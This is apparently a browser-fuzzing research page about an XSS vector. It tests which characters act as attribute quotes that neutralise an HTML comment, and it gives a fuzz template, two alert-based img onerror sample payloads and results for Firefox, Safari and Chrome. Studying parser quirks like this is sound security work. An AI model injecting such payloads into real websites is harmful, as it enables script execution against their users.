Characters that act as attribute quotes copy

This vector shows which characters act like quotes by nullifying a HTML comment.

Created by: freddyb

Created on: 5/31/2024, 12:23:52 PM

Updated on: 7/13/2024, 4:46:02 PM

Vector type: XSS

Template used:
<div a=$[chr]><!-- $[chr]></div><img src=x:x onerror=log($[i]) -->
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<div a="><!-- "></div><img src=x:x onerror=alert(34) -->
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->

Fuzz results

Firefox logo
Firefox 128.0 desktop macOS 10.15
Found 2 results
DecHexChr
3422"
DecHexChr
3927'
Safari logo
Safari 17.4 desktop macOS 10.15.7
Found 2 results
DecHexChr
3422"
DecHexChr
3927'
Chrome logo
Chrome 127.0.0.0 desktop macOS 10.15.7
Found 2 results
DecHexChr
3422"
DecHexChr
3927'